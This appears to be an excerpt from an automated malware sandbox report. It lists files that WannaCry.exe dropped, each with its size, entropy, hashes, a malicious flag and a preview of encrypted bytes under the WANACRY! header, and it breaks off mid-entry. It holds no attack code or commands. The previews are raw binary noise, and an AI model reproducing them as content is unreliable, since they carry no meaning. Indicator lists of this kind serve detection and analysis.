                                                                              Preview:WANACRY!.......Z..5.P:..[.......{.?....o!.LH......$.U.......w..M..8A.vh.m.N.1....>R.5..J?.B...M=...4+..1r7.f....,..e..P6..........x0.....eS.y713..z..d..l.K,A.Y.Z......".n{...m`;.i5V{.=.t.W..R+.Uu,.q.!Hj.'fk.72>v.d.5ZT.......].-H\....*..F.+7.-oX.Iz[WS~.c5...$....2X.........5 s%B@..69..B...o|......3.r..p..>..a...cH..=.....j..^^'$._....f..[...Z.^y#..^qC.(.....`HoV.X...T..t%r.u......=@G1.'.....02..bS.RX|.9gx...)*.X'k.:...8.y._.....5A..~....1......5.F.B......Y....b.._..j.._Ln.9.... .2.6.>._.Z.QM..c.v...Q....*.R./M.Q`.y7F$.....a.."..N.....D..wW.d@.,R...0S.Kn[...9."...&r......`|...........5w.9.+c.1....e..g..Ig..G.EF..0.Z....\.......[...B.O.^=(y...4<S...<..BY.6P.!..t......#.m...D.'..h.j.~..b&J...1r.[Y>,b..^@. !#yW "...OB. .[.....c./ro..o.sq.7..O.....d*.......S.....y_........o.........b.^.....)ns.U.~......p..f.L...;TH....M...5..4...GnW.....A..x....)R.W{./.@.p.$..p..}uE6..s1Z.;......V3L...]>...7..D.&..O.b`)....@^...U....R.Q.JE8.|o.}.........LNK...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):416088
                                                                              Entropy (8bit):7.9996080281300745
                                                                              Encrypted:true
                                                                              SSDEEP:6144:poQtOCW8J8ChvEi+xmHdY79RMKEsakLatQtdyA0g0K9as4RRNbB+7+Qpb8C3:Je2vEvxWY0JkLaejEg0KUsULB+iQJ84
                                                                              MD5:C3998F497A18DD05B450F6275BAEFC7E
                                                                              SHA1:683461F65BF33D9491888C06F7C773F37473B0B6
                                                                              SHA-256:E86F71621638182FEF2EF7E5F92AF56B944F6FB889C5F542C8BD9148A7BBE1C2
                                                                              SHA-512:864818F50728858634E9222CF88D5A2B88BCBAD6FB541EBC3683AA7DE72775EBA19CA59888E7AB0F26220228695AD9763B9975BABA34EC10E146991AE82DE7BA
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......Z..5.P:..[.......{.?....o!.LH......$.U.......w..M..8A.vh.m.N.1....>R.5..J?.B...M=...4+..1r7.f....,..e..P6..........x0.....eS.y713..z..d..l.K,A.Y.Z......".n{...m`;.i5V{.=.t.W..R+.Uu,.q.!Hj.'fk.72>v.d.5ZT.......].-H\....*..F.+7.-oX.Iz[WS~.c5...$....2X.........5 s%B@..69..B...o|......3.r..p..>..a...cH..=.....j..^^'$._....f..[...Z.^y#..^qC.(.....`HoV.X...T..t%r.u......=@G1.'.....02..bS.RX|.9gx...)*.X'k.:...8.y._.....5A..~....1......5.F.B......Y....b.._..j.._Ln.9.... .2.6.>._.Z.QM..c.v...Q....*.R./M.Q`.y7F$.....a.."..N.....D..wW.d@.,R...0S.Kn[...9."...&r......`|...........5w.9.+c.1....e..g..Ig..G.EF..0.Z....\.......[...B.O.^=(y...4<S...<..BY.6P.!..t......#.m...D.'..h.j.~..b&J...1r.[Y>,b..^@. !#yW "...OB. .[.....c./ro..o.sq.7..O.....d*.......S.....y_........o.........b.^.....)ns.U.~......p..f.L...;TH....M...5..4...GnW.....A..x....)R.W{./.@.p.$..p..}uE6..s1Z.;......V3L...]>...7..D.&..O.b`)....@^...U....R.Q.JE8.|o.}.........LNK...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):36888
                                                                              Entropy (8bit):7.994337226054672
                                                                              Encrypted:true
                                                                              SSDEEP:768:zZigGIM3HNUPXNaUsMtA7GwPUJJsxQwqJqywgeUGUyROSGZ3Eg+GgBK:zZilIKH5Mtu/PUJJsxkJoxrtsSGZ0sgI
                                                                              MD5:F337E11A41FE82E6FD99182DA11A6AF5
                                                                              SHA1:060218C1D57D8E203BF1D31CB63A14D1B919C65C
                                                                              SHA-256:A0F40EC11248520F9941C372E098D442A869D00C61F3827AE059861D548171E9
                                                                              SHA-512:C72BBF12008630DDE08DD28941FD62557C6028D0EF04FA5A869513340F0E3D5053317E57EDEB60475E41BBE35696395EDAD15FDE2959E11C5967CBED76282444
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....zyP0S&m.u.kh.....D....`.i+0..m.z.=.H.....;./..(~>.J.As..M$.........Mq..a[G.w+^....K .!....*..\.Di.Y.......b...s$5..F".4..'.. ..A..a..D...2.j@...Pl.a..10.Z...1t4.d<..\y...b...o...-.'3.w....Z.." Xx.s.m..W..?.V.N.L....(...iy..vX.........~...................P.h,X..yw...DmT<\..!...)..9.L....d.Y-..:.K.2..=U...J.]7'eu.5.ua.Fl....I.09.~...2.2.H...]d3..~..8w.....El.O8{(.Jh...6.......7.@.e...R.!...e......@.[./.%.N+.....P.X.=..Q...o....k..".1cep8.Z.p.e.t.j...'C..rW7......'/G...D...J.~.../......VW.5...e...Y.@........sw.D.i1.w.......41.v.b......../.U..r.].B"..w...0....1^....l.s.k..K..\'.~..3..p...9D..g>....t...G..#Z.....`...B..f.<q. %j. .......|...O\...~w....[xsF.(1.../..X...\`C.\.#.F-..;l8..G..BY..L.C..rDW(......."s.L.V.B..Roe.=u..h.!kv....d......7HY6...5.M..f9.M....C-.......+.......<..:.U.z_*E;.)6.0KW.a....4....d..H..4....A.U....3QW.&M.}...S7.a.9....,=.[....Q._nv........E}....".f.o...fP..............cs.l.K..%.'}.Q..l.c&5...F...{6(...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):36888
                                                                              Entropy (8bit):7.994337226054672
                                                                              Encrypted:true
                                                                              SSDEEP:768:zZigGIM3HNUPXNaUsMtA7GwPUJJsxQwqJqywgeUGUyROSGZ3Eg+GgBK:zZilIKH5Mtu/PUJJsxkJoxrtsSGZ0sgI
                                                                              MD5:F337E11A41FE82E6FD99182DA11A6AF5
                                                                              SHA1:060218C1D57D8E203BF1D31CB63A14D1B919C65C
                                                                              SHA-256:A0F40EC11248520F9941C372E098D442A869D00C61F3827AE059861D548171E9
                                                                              SHA-512:C72BBF12008630DDE08DD28941FD62557C6028D0EF04FA5A869513340F0E3D5053317E57EDEB60475E41BBE35696395EDAD15FDE2959E11C5967CBED76282444
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....zyP0S&m.u.kh.....D....`.i+0..m.z.=.H.....;./..(~>.J.As..M$.........Mq..a[G.w+^....K .!....*..\.Di.Y.......b...s$5..F".4..'.. ..A..a..D...2.j@...Pl.a..10.Z...1t4.d<..\y...b...o...-.'3.w....Z.." Xx.s.m..W..?.V.N.L....(...iy..vX.........~...................P.h,X..yw...DmT<\..!...)..9.L....d.Y-..:.K.2..=U...J.]7'eu.5.ua.Fl....I.09.~...2.2.H...]d3..~..8w.....El.O8{(.Jh...6.......7.@.e...R.!...e......@.[./.%.N+.....P.X.=..Q...o....k..".1cep8.Z.p.e.t.j...'C..rW7......'/G...D...J.~.../......VW.5...e...Y.@........sw.D.i1.w.......41.v.b......../.U..r.].B"..w...0....1^....l.s.k..K..\'.~..3..p...9D..g>....t...G..#Z.....`...B..f.<q. %j. .......|...O\...~w....[xsF.(1.../..X...\`C.\.#.F-..;l8..G..BY..L.C..rDW(......."s.L.V.B..Roe.=u..h.!kv....d......7HY6...5.M..f9.M....C-.......+.......<..:.U.z_*E;.)6.0KW.a....4....d..H..4....A.U....3QW.&M.}...S7.a.9....,=.[....Q._nv........E}....".f.o...fP..............cs.l.K..%.'}.Q..l.c&5...F...{6(...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.095740190229417
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEbKZ61hF+C1zrp962YkfIL+SV6xan3hrYfpuCqpSVwO:bkEbM0hF+urpHfM643hrYfpmpS+O
                                                                              MD5:77A5D309B72ADEAE922DD9B62EDB7FDE
                                                                              SHA1:920D26CAAE7DC03343F28CDBB9A7939A9B446DA7
                                                                              SHA-256:02C74D7A54682D5D7E4EFA03C988D56952FC95F5BDFCE52B59DC38BD7AB9A904
                                                                              SHA-512:9CFD8DF04ED2D0665D96F03F39BBBD56A7BB19DAF359BF2133E264AD87DE1CC2CE4322786BE9518793BA9DB1F0D9E427B545D74068552439857FC3507BB93E9F
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....<Op...d..@.I.i......STd.+..=.c...[..........-....p.:......&-b.Xr.BBP..N.t.!K4#G..6.T..Y.....~[Wm......B..y.]&Y7......M.....[..COp.......'.R.t.x.r...{.`Ls..l.!._b-Hd..Y........6E..V..%WZn..LT.A....(..Au....U........].b...?.v..KI*...K..Oo.3.Z..7............... ..~~.AD}.D#.L
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.095740190229417
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEbKZ61hF+C1zrp962YkfIL+SV6xan3hrYfpuCqpSVwO:bkEbM0hF+urpHfM643hrYfpmpS+O
                                                                              MD5:77A5D309B72ADEAE922DD9B62EDB7FDE
                                                                              SHA1:920D26CAAE7DC03343F28CDBB9A7939A9B446DA7
                                                                              SHA-256:02C74D7A54682D5D7E4EFA03C988D56952FC95F5BDFCE52B59DC38BD7AB9A904
                                                                              SHA-512:9CFD8DF04ED2D0665D96F03F39BBBD56A7BB19DAF359BF2133E264AD87DE1CC2CE4322786BE9518793BA9DB1F0D9E427B545D74068552439857FC3507BB93E9F
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....<Op...d..@.I.i......STd.+..=.c...[..........-....p.:......&-b.Xr.BBP..N.t.!K4#G..6.T..Y.....~[Wm......B..y.]&Y7......M.....[..COp.......'.R.t.x.r...{.`Ls..l.!._b-Hd..Y........6E..V..%WZn..LT.A....(..Au....U........].b...?.v..KI*...K..Oo.3.Z..7............... ..~~.AD}.D#.L
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.083066153054798
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEoMLwrs1qCpjjxwgB/4X8e4prZcoCO5g0pFyepgSSftb9Sbkj4n:bkEZwYACNxw8QXU0VO5gOFyepaS04
                                                                              MD5:DB411451898626368F001116E4742CBC
                                                                              SHA1:374BA6ABCA3FB852EC87BCF3102FFCA4585007DD
                                                                              SHA-256:5EBC3F3F2A262ABB423F16F239A1C5E6C7810F99932C131DBBAA018D2C3E4E08
                                                                              SHA-512:55EC0FDB968077C8265636835A32AA8F3686E9B361D51E1ABFC04A3A2AA17C5F8BDCBC394B1B164332B33F0016F123289DC7771914BC97F406469DAF7185B37F
                                                                              Malicious:false
                                                                              Preview:WANACRY!....F5.]...[...G0...|6..Bn7....5..nh...5....|..V.hG/.g[......k3.....d...n...'\/..J.......Ww...\.X..t[.K.....^rK....KM..2 ..on.<..q_.a7/.|...k......W...O......`.k...#...,.?3....K.....:..u...k...!n_...B`...T.......R..$.'..|...}-...k.....H.n..d............-hM5,.[..Bq..i\
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.083066153054798
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEoMLwrs1qCpjjxwgB/4X8e4prZcoCO5g0pFyepgSSftb9Sbkj4n:bkEZwYACNxw8QXU0VO5gOFyepaS04
                                                                              MD5:DB411451898626368F001116E4742CBC
                                                                              SHA1:374BA6ABCA3FB852EC87BCF3102FFCA4585007DD
                                                                              SHA-256:5EBC3F3F2A262ABB423F16F239A1C5E6C7810F99932C131DBBAA018D2C3E4E08
                                                                              SHA-512:55EC0FDB968077C8265636835A32AA8F3686E9B361D51E1ABFC04A3A2AA17C5F8BDCBC394B1B164332B33F0016F123289DC7771914BC97F406469DAF7185B37F
                                                                              Malicious:false
                                                                              Preview:WANACRY!....F5.]...[...G0...|6..Bn7....5..nh...5....|..V.hG/.g[......k3.....d...n...'\/..J.......Ww...\.X..t[.K.....^rK....KM..2 ..on.<..q_.a7/.|...k......W...O......`.k...#...,.?3....K.....:..u...k...!n_...B`...T.......R..$.'..|...}-...k.....H.n..d............-hM5,.[..Bq..i\
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048856
                                                                              Entropy (8bit):7.999815289953598
                                                                              Encrypted:true
                                                                              SSDEEP:24576:a914+cmirdGbQaqF29AeLhK6E9KcVt5Nm6B4IpAks/5YakHnwxvFPA:aA+cmirskFFYLhK6sK0jIW4IpAks/ZxG
                                                                              MD5:322209E767B7E686D424946DE0A4A599
                                                                              SHA1:AE041161AB181F7F1F1FB1AA3D518245E60F7441
                                                                              SHA-256:E061DF2870C1DBBD28436E8507546571A3F2BE77A6FB6511D6FDB00C56F19A77
                                                                              SHA-512:FF960C052E9A54CA15FF01A89D08AD7C8802566704FE0133E23059AEC224A87597014FBC4B73705D1708622D9747679BAF4161628CC392F122D0C2DDD6E13A94
                                                                              Malicious:true
                                                                              Preview:WANACRY!....&n.........P9......qB....l...*..os...i....q2.};.!.O..{\.X"..4S)yNe..yw:.$....=..7...".Oo...@.$.J1.2A.W...rn..j..1y*..bi+....c.9.T.........a.....%+|.^..Z,N|c..(vb..'Nw....:../.W...'h*.8.<,.k1\U.'A...#'.S...@..f.(..A,...s..r.....O<gb...XF......."f:Z................39..<..-/(./.3.9CN...?#O..Bf.sF...B..h.B..8D.H|.....H.;..;.p...b.........)m.h./.+....|.a.+..|3x./..4~......Uj...a.....9.SvS.V..Iv.U..L..$..t....f...T]q=.3..m...?.6..x H...wd..(.6....WKX.u...%%|OZ.?8>....+..O......d..........B7=....r'2^..\...h.lD..NU!".Ed..?.Z..M.e).Zo.z.@8...9........../..V.C..u~..T..<h.4+...s.FN... .N..K..?...h.cO...?|.'.J...../d.+tU..6..?.yGk0.......;.uH@.~@..W...t~.S0p...b.E..........q.".G..1...4.~..x.#J.M.,'nD.A....M....]....)*.....L......~7a....?[..xW'...H..N..i....s..[.(......G9.?.>....u>.A.|c.2.....L..E...._..(.l-.. O0s..d5...g.09B_C.....ff}.:.ZH#.b.}-6....q.H...%.*Nq7....Wo.i);..3.x0.CJ...!..Xv........u......:.&Jb..~'Y.V-.#t.:.We:G...Krh...]u.0].=q.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048856
                                                                              Entropy (8bit):7.999815289953598
                                                                              Encrypted:true
                                                                              SSDEEP:24576:a914+cmirdGbQaqF29AeLhK6E9KcVt5Nm6B4IpAks/5YakHnwxvFPA:aA+cmirskFFYLhK6sK0jIW4IpAks/ZxG
                                                                              MD5:322209E767B7E686D424946DE0A4A599
                                                                              SHA1:AE041161AB181F7F1F1FB1AA3D518245E60F7441
                                                                              SHA-256:E061DF2870C1DBBD28436E8507546571A3F2BE77A6FB6511D6FDB00C56F19A77
                                                                              SHA-512:FF960C052E9A54CA15FF01A89D08AD7C8802566704FE0133E23059AEC224A87597014FBC4B73705D1708622D9747679BAF4161628CC392F122D0C2DDD6E13A94
                                                                              Malicious:true
                                                                              Preview:WANACRY!....&n.........P9......qB....l...*..os...i....q2.};.!.O..{\.X"..4S)yNe..yw:.$....=..7...".Oo...@.$.J1.2A.W...rn..j..1y*..bi+....c.9.T.........a.....%+|.^..Z,N|c..(vb..'Nw....:../.W...'h*.8.<,.k1\U.'A...#'.S...@..f.(..A,...s..r.....O<gb...XF......."f:Z................39..<..-/(./.3.9CN...?#O..Bf.sF...B..h.B..8D.H|.....H.;..;.p...b.........)m.h./.+....|.a.+..|3x./..4~......Uj...a.....9.SvS.V..Iv.U..L..$..t....f...T]q=.3..m...?.6..x H...wd..(.6....WKX.u...%%|OZ.?8>....+..O......d..........B7=....r'2^..\...h.lD..NU!".Ed..?.Z..M.e).Zo.z.@8...9........../..V.C..u~..T..<h.4+...s.FN... .N..K..?...h.cO...?|.'.J...../d.+tU..6..?.yGk0.......;.uH@.~@..W...t~.S0p...b.E..........q.".G..1...4.~..x.#J.M.,'nD.A....M....]....)*.....L......~7a....?[..xW'...H..N..i....s..[.(......G9.?.>....u>.A.|c.2.....L..E...._..(.l-.. O0s..d5...g.09B_C.....ff}.:.ZH#.b.}-6....q.H...%.*Nq7....Wo.i);..3.x0.CJ...!..Xv........u......:.&Jb..~'Y.V-.#t.:.We:G...Krh...]u.0].=q.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2680
                                                                              Entropy (8bit):7.9255527896652715
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk4lwqcGU5ufm/OAGd7v39hl4YbXXN0jVDES/6ro+BN9/c3US//ypbj:oIgx5u6PG19hkhD+ro+T9bE0
                                                                              MD5:8B20E6DF819D1206D795C178306C7AB8
                                                                              SHA1:2A99E656F9B8E005BA4CB8E72F41420F9C7C6475
                                                                              SHA-256:13DB49CBA06D538B320406F97F027A4F3F53ED0EDC4B7FCCB0FCF7807349CD07
                                                                              SHA-512:131F36F5294A43AF633D375154F6F289AB57FBF86784132B9A35F6E9522CEC0ECDB87085EB28E20E89D2EDD3BD6C55885B3CA68E0668E94DA7F72DAE422FF2BE
                                                                              Malicious:false
                                                                              Preview:WANACRY!......f=5..,..4..7$>.^.. ._.B..e9<...j...<2........m..T....8.#I ...>Nyo.z...'...p...?:N.r.......u...&.....!.(B..k....vm..$.K~..+(.B.tLhWb..K)r......T#5..t...._...G>......s.Yy.../mf....*.'.mGu..l<B...*..n......')...........+6...y......^.o...Q........Y.......-|....i.T.......2...:k.......z..q".o....b.{^..D.N...>B...m.k.<awU..L........L.6(<............^..A....R......*.:.j..&.l..'q.M[..&..l........{..g..y...o..8..&%Hn.Za]....,.h+.r..Q...:...o(.?d+.q.._....'..y.2...-Q....6a.*...]y.?N....9#.#^Z...1i..v.^b.EK..%......M%Mit.n....,}c.._0....N..T.9.qK..->.0.<.:..|.7..D...H..B..c.l(B...g3..B.A..e.L..w*V...b...w!&...-jf)...M.....9. .....;.N...K..t.d.. .B.......z.Up.0h....n...K91.&.5.....xiL...wP.1q.9.;[Y.^...p....O.sMj.4<.....b.S.9.6...7..-...T.}..N...#..O..Hq~.....R..PX..<.....(._.l..z....).......\)!Jz............(......n...!.6m.t..{^V$..Q&.........M...T.q..J1....f?.F.w...........n.S0...\)...W....~Wr}){....)N....}..O...\...[..:.AS._N..Wi
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2680
                                                                              Entropy (8bit):7.9255527896652715
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk4lwqcGU5ufm/OAGd7v39hl4YbXXN0jVDES/6ro+BN9/c3US//ypbj:oIgx5u6PG19hkhD+ro+T9bE0
                                                                              MD5:8B20E6DF819D1206D795C178306C7AB8
                                                                              SHA1:2A99E656F9B8E005BA4CB8E72F41420F9C7C6475
                                                                              SHA-256:13DB49CBA06D538B320406F97F027A4F3F53ED0EDC4B7FCCB0FCF7807349CD07
                                                                              SHA-512:131F36F5294A43AF633D375154F6F289AB57FBF86784132B9A35F6E9522CEC0ECDB87085EB28E20E89D2EDD3BD6C55885B3CA68E0668E94DA7F72DAE422FF2BE
                                                                              Malicious:false
                                                                              Preview:WANACRY!......f=5..,..4..7$>.^.. ._.B..e9<...j...<2........m..T....8.#I ...>Nyo.z...'...p...?:N.r.......u...&.....!.(B..k....vm..$.K~..+(.B.tLhWb..K)r......T#5..t...._...G>......s.Yy.../mf....*.'.mGu..l<B...*..n......')...........+6...y......^.o...Q........Y.......-|....i.T.......2...:k.......z..q".o....b.{^..D.N...>B...m.k.<awU..L........L.6(<............^..A....R......*.:.j..&.l..'q.M[..&..l........{..g..y...o..8..&%Hn.Za]....,.h+.r..Q...:...o(.?d+.q.._....'..y.2...-Q....6a.*...]y.?N....9#.#^Z...1i..v.^b.EK..%......M%Mit.n....,}c.._0....N..T.9.qK..->.0.<.:..|.7..D...H..B..c.l(B...g3..B.A..e.L..w*V...b...w!&...-jf)...M.....9. .....;.N...K..t.d.. .B.......z.Up.0h....n...K91.&.5.....xiL...wP.1q.9.;[Y.^...p....O.sMj.4<.....b.S.9.6...7..-...T.}..N...#..O..Hq~.....R..PX..<.....(._.l..z....).......\)!Jz............(......n...!.6m.t..{^V$..Q&.........M...T.q..J1....f?.F.w...........n.S0...\)...W....~Wr}){....)N....}..O...\...[..:.AS._N..Wi
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1912
                                                                              Entropy (8bit):7.891593331101747
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk9LuGW4+S6amgrOVcLIXXRZqWgkDi4d3oZV:oRNzCgucIRkWgkUV
                                                                              MD5:396553213321A8188C4D2430EA47D930
                                                                              SHA1:3291CF359EDF6482E5E724AD9FFB96A8A5CCEF66
                                                                              SHA-256:94ED3A8AF48DC4249A87F51314034F4315877FAB7364079BF1AA6B8F9DCF5532
                                                                              SHA-512:92FBA328F6E2D206A32D0E65659BF6B6F865C11638A3E1D6DCDEBE845AE3A62102CCE8A278AB604314C0296CAB4E3DD1ABE2608DA67A308E2E6E92A91E7542C2
                                                                              Malicious:false
                                                                              Preview:WANACRY!....rbx~..P...N...."w.}..\.......Y.iI.c*..fh..^.k...].)Dx'>...c...*.B.^..2pw/..u%.:< .7'Q._..<_:h.......e.?..w.""m...h.z.......E......7h.Q..D...:.U......q.....O.....*..=.....<.I.../....8...W.u..T....".7.C.`......z#DM.1..%..t.U.!.T.O~TKc,/s.t.-.~U....[.............^.(..sT.V".\5.`.5.T.....l..2..n}...C.+....Y;|...g..t`_m.~.I.V.k..Dn..S.s.....>.l"\..).<..h..h...2.J.....""zB.T.u.p-.Q.. .`.".q-..gy$.Z.n.m....j,lwV/..Z...O.pG...?..-.[.......XH.....Yb..Q..z.C..[..p..'(&&....[....d..]T.L.do*....j,Nq.{s...uD}6..7.....fc..k.v...c{t.........\.c..}<...H...f#.......%W......]....n...-...<...k....FV.m...R.`....ML.v3j..5f'/2..8K.c.f.9.9...}(.'..%V.z...Dx.ZH|~.....c......\....fS.-.._U......i3.g.0N#X.4O..[..u...........Q(....Sb.?.....N....../dUX.q...+.7....k..Q......b..2.N.0....{.+.b...%#3EE>..e...Q.....o\.~..,......D..3......`.O...?6.t...HE...O.m[...ec,....a.I..R...a-.7N+.h...y....v.....Z~|y.N.T..\..c.......8..^..v.T..GZ.o.rP.....'.|.}...?.p.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1912
                                                                              Entropy (8bit):7.891593331101747
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk9LuGW4+S6amgrOVcLIXXRZqWgkDi4d3oZV:oRNzCgucIRkWgkUV
                                                                              MD5:396553213321A8188C4D2430EA47D930
                                                                              SHA1:3291CF359EDF6482E5E724AD9FFB96A8A5CCEF66
                                                                              SHA-256:94ED3A8AF48DC4249A87F51314034F4315877FAB7364079BF1AA6B8F9DCF5532
                                                                              SHA-512:92FBA328F6E2D206A32D0E65659BF6B6F865C11638A3E1D6DCDEBE845AE3A62102CCE8A278AB604314C0296CAB4E3DD1ABE2608DA67A308E2E6E92A91E7542C2
                                                                              Malicious:false
                                                                              Preview:WANACRY!....rbx~..P...N...."w.}..\.......Y.iI.c*..fh..^.k...].)Dx'>...c...*.B.^..2pw/..u%.:< .7'Q._..<_:h.......e.?..w.""m...h.z.......E......7h.Q..D...:.U......q.....O.....*..=.....<.I.../....8...W.u..T....".7.C.`......z#DM.1..%..t.U.!.T.O~TKc,/s.t.-.~U....[.............^.(..sT.V".\5.`.5.T.....l..2..n}...C.+....Y;|...g..t`_m.~.I.V.k..Dn..S.s.....>.l"\..).<..h..h...2.J.....""zB.T.u.p-.Q.. .`.".q-..gy$.Z.n.m....j,lwV/..Z...O.pG...?..-.[.......XH.....Yb..Q..z.C..[..p..'(&&....[....d..]T.L.do*....j,Nq.{s...uD}6..7.....fc..k.v...c{t.........\.c..}<...H...f#.......%W......]....n...-...<...k....FV.m...R.`....ML.v3j..5f'/2..8K.c.f.9.9...}(.'..%V.z...Dx.ZH|~.....c......\....fS.-.._U......i3.g.0N#X.4O..[..u...........Q(....Sb.?.....N....../dUX.q...+.7....k..Q......b..2.N.0....{.+.b...%#3EE>..e...Q.....o\.~..,......D..3......`.O...?6.t...HE...O.m[...ec,....a.I..R...a-.7N+.h...y....v.....Z~|y.N.T..\..c.......8..^..v.T..GZ.o.rP.....'.|.}...?.p.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2696
                                                                              Entropy (8bit):7.934940408093085
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk0QDU9pHs+kYSKJzKjPOF6PpUx/nfvzt9fmItJBlEXdwZVVMeiGqXV:oZDBNjO3x/fv59pBOaVVMYkV
                                                                              MD5:750D6F444ABE8ECA95299B8553B29D44
                                                                              SHA1:8C66743CD561A370A834F9CA0CB6CDFA354DD1D4
                                                                              SHA-256:E49D1D1FA3870D1281CE131E170F8C86544A76B769DACE18FB32C50DD0D22578
                                                                              SHA-512:E92D628C17BABBC5E43970B85D6EEF4421878983BFD08A8E1622FA31830B5A9C1CE5C33AA34CB6EF8D00B1BA6803A8031B72AED049810B5742B083D12504488D
                                                                              Malicious:false
                                                                              Preview:WANACRY!......,T.P..t1..U.Rd.fU..kn..s...!.L..2.....Q....=...J...&O...?=.P}..C....<...U.{#..f...E...N...V..^_....7L_..I.`j..N...Q3F..l...$..E....Y.1...C...WF%#..(.....*....6..u.#v.^[.C.d.Q.<......aj)W?....B.i{!..T#.r..5.:..B..g..KY..wl....8.m..}!......2{.P..V....a..........K.a`...Oj...N..j..T.I@........-..\.."}..${....g..G.......$.......y)mv...D.0.a7......2..ss..rIn5.!.s..9uyzU.3zP.3..='...Z...S..P........Q....9....].\..w...3.[3...r...u.|.......K4.\...U.....u6.Ag..l....*Y8..{?.k....Z....2p...0m...F..tA.Nj.$.F...6...Y%\.H..v....)d.+^9.u...6&sc..}.n..E[..[.)F.RG...o%@.B.......(x...=Hs<..B|%.N...B..wT.....0....}..;.v.a&dRJ{.0V..<a...M;..4....]..2.$...=.."..?.R/...{,(>M.....lH..0.......J@..<.$......p...#....F........N.7..-....!g./+...p8k.W..<pl[.H..\x.,w.ufGgC.B.jM5`v......%.1..g..k....-b]`...H..v.xV..U...l...d.?.7.O.u...W.r...R.tS~.A..r.c...\.$..v.K.Ta".f..WM<.......y..w..C.\...E+.v^].Z..R......#.w...t.4R{....ky.....z2.. ...Mu..:*-.h..z.E...~..G ..).%..Wq?.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2696
                                                                              Entropy (8bit):7.934940408093085
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk0QDU9pHs+kYSKJzKjPOF6PpUx/nfvzt9fmItJBlEXdwZVVMeiGqXV:oZDBNjO3x/fv59pBOaVVMYkV
                                                                              MD5:750D6F444ABE8ECA95299B8553B29D44
                                                                              SHA1:8C66743CD561A370A834F9CA0CB6CDFA354DD1D4
                                                                              SHA-256:E49D1D1FA3870D1281CE131E170F8C86544A76B769DACE18FB32C50DD0D22578
                                                                              SHA-512:E92D628C17BABBC5E43970B85D6EEF4421878983BFD08A8E1622FA31830B5A9C1CE5C33AA34CB6EF8D00B1BA6803A8031B72AED049810B5742B083D12504488D
                                                                              Malicious:false
                                                                              Preview:WANACRY!......,T.P..t1..U.Rd.fU..kn..s...!.L..2.....Q....=...J...&O...?=.P}..C....<...U.{#..f...E...N...V..^_....7L_..I.`j..N...Q3F..l...$..E....Y.1...C...WF%#..(.....*....6..u.#v.^[.C.d.Q.<......aj)W?....B.i{!..T#.r..5.:..B..g..KY..wl....8.m..}!......2{.P..V....a..........K.a`...Oj...N..j..T.I@........-..\.."}..${....g..G.......$.......y)mv...D.0.a7......2..ss..rIn5.!.s..9uyzU.3zP.3..='...Z...S..P........Q....9....].\..w...3.[3...r...u.|.......K4.\...U.....u6.Ag..l....*Y8..{?.k....Z....2p...0m...F..tA.Nj.$.F...6...Y%\.H..v....)d.+^9.u...6&sc..}.n..E[..[.)F.RG...o%@.B.......(x...=Hs<..B|%.N...B..wT.....0....}..;.v.a&dRJ{.0V..<a...M;..4....]..2.$...=.."..?.R/...{,(>M.....lH..0.......J@..<.$......p...#....F........N.7..-....!g./+...p8k.W..<pl[.H..\x.,w.ufGgC.B.jM5`v......%.1..g..k....-b]`...H..v.xV..U...l...d.?.7.O.u...W.r...R.tS~.A..r.c...\.$..v.K.Ta".f..WM<.......y..w..C.\...E+.v^].Z..R......#.w...t.4R{....ky.....z2.. ...Mu..:*-.h..z.E...~..G ..).%..Wq?.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1864
                                                                              Entropy (8bit):7.8780865939023315
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkKBSjPF9PFcAIDNJO8yLMjgQXRWCZyMwKcgwhBYKCJYF:oKUN9n+gig8wMtc5hSdS
